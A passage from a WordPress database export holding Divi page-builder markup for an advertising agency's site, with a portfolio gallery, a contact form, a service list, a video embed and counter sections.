header_2_text_color=\"#d4b068\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>our Work</h2>\r[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.5.2\" text_font=\"Montserrat||||\" text_text_color=\"#f7f7f7\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\" hover_enabled=\"0\"]<p><span>Creative &amp; Effective work around practical marketing problems. Next update will have your creatives.</span></p>\n[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"2\" admin_label=\"Other Recent Works Area\" _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" max_width=\"80%\" use_custom_width=\"on\" width_unit=\"off\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/home-office-06.jpg\" show_in_lightbox=\"on\" use_overlay=\"on\" overlay_icon_color=\"#353740\" hover_overlay_color=\"#d4b068\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" animation_style=\"zoom\" animation_intensity_zoom=\"20%\" animation_starting_opacity=\"100%\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/home-office-05.jpg\" show_in_lightbox=\"on\" use_overlay=\"on\" overlay_icon_color=\"#353740\" hover_overlay_color=\"#d4b068\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" animation_style=\"zoom\" animation_delay=\"100ms\" animation_intensity_zoom=\"20%\" animation_starting_opacity=\"100%\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/home-office-02.jpg\" show_in_lightbox=\"on\" use_overlay=\"on\" overlay_icon_color=\"#353740\" hover_overlay_color=\"#d4b068\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" animation_style=\"zoom\" animation_delay=\"200ms\" animation_intensity_zoom=\"20%\" animation_starting_opacity=\"100%\" locked=\"off\"][/et_pb_image][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_button button_url=\"#\" button_text=\"View All\" button_alignment=\"center\" _builder_version=\"3.16\" custom_button=\"on\" button_text_color=\"#f7f7f7\" button_border_width=\"4px\" button_border_color=\"#f7f7f7\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#fcd21d\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"20%\" button_text_color_hover=\"#747d88\" button_border_color_hover=\"#747d88\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#747d88\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#747d88\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Contact Form Section\" _builder_version=\"4.5.2\" background_color=\"#d4b068\" custom_padding=\"110px||110px|\" animation_style=\"zoom\" animation_direction=\"bottom\" animation_intensity_zoom=\"10%\" saved_tabs=\"all\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Let\'s Start Something new<br /><span style=\"color: #FFF;\">Say Hello!</span></h2>\r[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.5.2\" text_font=\"Montserrat||||\" text_text_color=\"#353740\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\" hover_enabled=\"0\"]<p><span>We would love to connect up and join your brand journey. Do not hesitate to question/drop us a line, As discerning mind always take better decision.</span></p>\n[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row admin_label=\"Contact Form\" _builder_version=\"3.25\" animation_style=\"fade\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_contact_form captcha=\"off\" submit_button_text=\"Send\" module_id=\"et_pb_contact_form_0\" _builder_version=\"4.5.2\" form_field_background_color=\"rgba(255,255,255,0)\" form_field_text_color=\"#353740\" form_field_font=\"Montserrat||||\" form_field_font_size=\"16px\" custom_button=\"on\" button_text_color=\"#ffffff\" button_border_width=\"5px\" button_border_color=\"#ffffff\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#ffffff\" max_width=\"800px\" module_alignment=\"center\" animation_style=\"fade\" hover_enabled=\"0\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"-1px\" box_shadow_color=\"rgba(0,0,0,0.18)\" form_background_color=\"rgba(255,255,255,0)\" button_text_color_hover=\"#ffffff\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_border_color_hover=\"#ffffff\" button_letter_spacing_hover=\"2px\" custom_message=\"Hi my name is %%Name%%, Email id is %%Email%% and Mobile No is %%Mobile_No%%, my message is %%Message%%\"][et_pb_contact_field field_id=\"Name\" field_title=\"Name\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field fullwidth_field=\"on\" _builder_version=\"4.5.2\" _module_preset=\"default\" field_id=\"Mobile_No\" field_title=\"Mobile No\" min_length=\"10\" max_length=\"10\" allowed_symbols=\"numbers\" hover_enabled=\"0\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Email\" field_title=\"Email Address\" field_type=\"email\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Message\" field_title=\"Message\" field_type=\"text\" fullwidth_field=\"on\" _builder_version=\"3.16\" custom_margin=\"||60px|\" custom_padding=\"|||\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][/et_pb_contact_form][/et_pb_column][/et_pb_row][/et_pb_section]','about-us','','inherit','closed','closed','','392-revision-v1','','','2020-08-07 18:28:13','2020-08-07 18:28:13','',392,'https://wthtest1.in8.cdn-alpha.com/2020/08/07/392-revision-v1/',0,'revision','',0),(529,1,'2020-08-07 18:28:21','2020-08-07 18:28:21','[et_pb_section fb_built=\"1\" admin_label=\"Hero\" _builder_version=\"3.22\" custom_padding=\"0px|0px|0px|0px\" animation_style=\"zoom\" animation_intensity_zoom=\"4%\"][et_pb_row use_custom_gutter=\"on\" gutter_width=\"1\" make_equal=\"on\" module_class=\" et_pb_row_fullwidth\" _builder_version=\"4.5.2\" background_color=\"#fcd21d\" background_image=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/banner.jpg\" width=\"100%\" width_tablet=\"100%\" width_phone=\"\" width_last_edited=\"on|desktop\" max_width=\"100%\" max_width_tablet=\"100%\" max_width_phone=\"\" max_width_last_edited=\"on|desktop\" custom_margin=\"|auto|1px|auto||\" custom_padding=\"50px||50px|||\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"3%\" make_fullwidth=\"on\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"10%|8%|10%|8%\" custom_padding__hover=\"|||\"][et_pb_text content_tablet=\"\" content_phone=\"<h1 style=%22text-align: center;%22><span style=%22color: #ffffff;%22>Welcome to</span><br /> <span style=%22color: #ffffff;%22> Advertising</span></h1>\n\" content_last_edited=\"on|phone\" _builder_version=\"4.4.9\" text_font=\"||||||||\" text_font_size=\"18px\" header_font=\"Montserrat|700||on|||||\" header_text_color=\"#f7f7f7\" header_font_size=\"76px\" header_line_height=\"1.3em\" custom_margin=\"6px||40px|||\" animation_style=\"zoom\" animation_duration=\"1200ms\" text_font_tablet=\"\" text_font_phone=\"\" text_font_last_edited=\"on|phone\" text_font_size_tablet=\"\" text_font_size_phone=\"12px\" text_font_size_last_edited=\"on|phone\" header_font_size_tablet=\"64px\" header_font_size_phone=\"40px\" header_font_size_last_edited=\"on|phone\" text_text_shadow_style=\"preset1\" locked=\"off\"]<h1 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Welcome to</span><br /> <span style=\"color: #ffffff;\"> Advertising</span></h1>[/et_pb_text][et_pb_button button_text=\"Learn More\" button_alignment=\"center\" _builder_version=\"4.4.9\" custom_button=\"on\" button_text_color=\"#ffffff\" button_border_width=\"4px\" button_border_color=\"#ffffff\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" animation_style=\"zoom\" animation_duration=\"1200ms\" box_shadow_style=\"preset2\" button_text_color_hover=\"#ffffff\" button_border_color_hover=\"#ffffff\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" locked=\"off\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#ffffff\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#ffffff\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" custom_padding_last_edited=\"on|tablet\" admin_label=\"Service Section\" _builder_version=\"4.4.9\" custom_margin=\"|||\" custom_padding=\"56px||110px|||\" custom_padding_tablet=\"20px||||false|false\" custom_padding_phone=\"12px||40px||false|false\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>What we do</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p><span>WhatTheHell? is not some advertising, digital and design agency. An irreverent ideas farm seems more like it.</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"2\" make_equal=\"on\" admin_label=\"Services\" _builder_version=\"3.25\" max_width=\"80%\" custom_padding=\"25px||25px|\" use_custom_width=\"on\" width_unit=\"off\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Creative\" use_icon=\"on\" font_icon=\"%%74%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>It is important for the creative process and our lives. A key component of visual marketing to let businesses succeed.</span></p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Media\" use_icon=\"on\" font_icon=\"%%103%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"100ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Strategically using new age media and creating a media mix effectively to evolve a sales funnel or brand awareness to engagement.</span></p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Digital\" use_icon=\"on\" font_icon=\"%%107%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"200ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Digital has emerged as one of the efficient media, there is no spill over with the help of professional targeting &amp; even individual targeting is possible.</span></p>[/et_pb_blurb][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"2\" make_equal=\"on\" admin_label=\"Services\" _builder_version=\"3.25\" max_width=\"80%\" custom_padding=\"25px||25px|\" use_custom_width=\"on\" width_unit=\"off\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Business Strategy\" use_icon=\"on\" font_icon=\"%%101%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Gaining the competitive edge with Integrated Marketing Communications (IMC) or building product marketing strategy / Go to market strategy, We are in.</span></p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Web Design\" use_icon=\"on\" font_icon=\"%%106%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"100ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p>Online presence of any brand/product/service starts with a well defined and clearly communicated website. Website is the key and elementry step for any advertising campaign. So be ready to a bolder start.</p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Design/Video/Photo\" use_icon=\"on\" font_icon=\"%%108%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"200ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Design is not Art, Art is about the Artist, &amp; Design is about the user. Blending &amp; Balancing Art, Design, Copy &amp; Business Objective is what we do.</span></p>[/et_pb_blurb][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Video Section\" _builder_version=\"4.4.9\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#ffffff\" background_color_gradient_end=\"#d4b068\" background_color_gradient_start_position=\"65%\" background_color_gradient_end_position=\"65%\" custom_padding=\"|||\"][et_pb_row admin_label=\"Video\" _builder_version=\"3.25\" custom_padding=\"0px|0px|0px|0px\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"4%\" animation_starting_opacity=\"100%\" box_shadow_style=\"preset1\" box_shadow_blur=\"77px\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_video src=\"https://www.youtube.com/watch?v=f47r43eO6BU&t=5s\" image_src=\"//i.ytimg.com/vi/f47r43eO6BU/hqdefault.jpg\" thumbnail_overlay_color=\"rgba(0,0,0,0.6)\" _builder_version=\"4.5.2\" animation_direction=\"bottom\" box_shadow_style=\"preset5\" box_shadow_vertical=\"0px\" box_shadow_spread=\"20px\" box_shadow_color=\"#ffffff\"][/et_pb_video][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Fun Fact Section\" _builder_version=\"4.4.9\" background_color=\"#d4b068\" custom_margin=\"|||\" custom_padding=\"60px||50px||false|false\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2><span style=\"color: #ffffff;\">Generating New Ideas. Solving real Problems</span></h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#353740\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p>Ideas are relevant if it has power to solve the real problem at hand. We are always keen on working practical ideas in the realtime business atmosphere.</p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_4,1_4,1_4,1_4\" admin_label=\"Fun Fact\" _builder_version=\"3.25\" custom_margin=\"|||\" custom_padding=\"40px||40px|\" animation_style=\"zoom\" animation_direction=\"top\" animation_intensity_zoom=\"10%\"][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Projects\" number=\"350\" percent_sign=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Satisfied Clients\" number=\"62\" percent_sign=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"100ms\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Ongoing Projects\" number=\"16\" percent_sign=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"200ms\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Cups Of Coffee\" number=\"906\" percent_sign=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"300ms\"][/et_pb_number_counter][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Feature Section\" _builder_version=\"4.4.9\" custom_margin=\"|||\" custom_padding=\"50px||3px||false|false\"][et_pb_row column_structure=\"1_2,1_2\" use_custom_gutter=\"on\" gutter_width=\"4\" custom_padding_last_edited=\"on|phone\" admin_label=\"Feature\" module_class=\" et_pb_row_fullwidth\" _builder_version=\"4.5.1\" width=\"86%\" width_tablet=\"80%\" width_phone=\"\" width_last_edited=\"on|desktop\" max_width=\"86%\" max_width_tablet=\"80%\" max_width_phone=\"\" max_width_last_edited=\"on|desktop\" custom_padding=\"40px||23px||false|false\" custom_padding_tablet=\"\" custom_padding_phone=\"0px||||false|false\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/Why-we.jpg\" alt=\"Why We\" title_text=\"Why-we\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" custom_margin=\"61px|||||\" custom_margin_tablet=\"\" custom_margin_phone=\"0px||||false|false\" custom_margin_last_edited=\"on|phone\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"8%\" animation_starting_opacity=\"100%\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"7%||7%|\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_text_align=\"left\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" max_width=\"700px\" module_alignment=\"left\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\" locked=\"off\"]<h2><span>Why choose us?</span></h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" 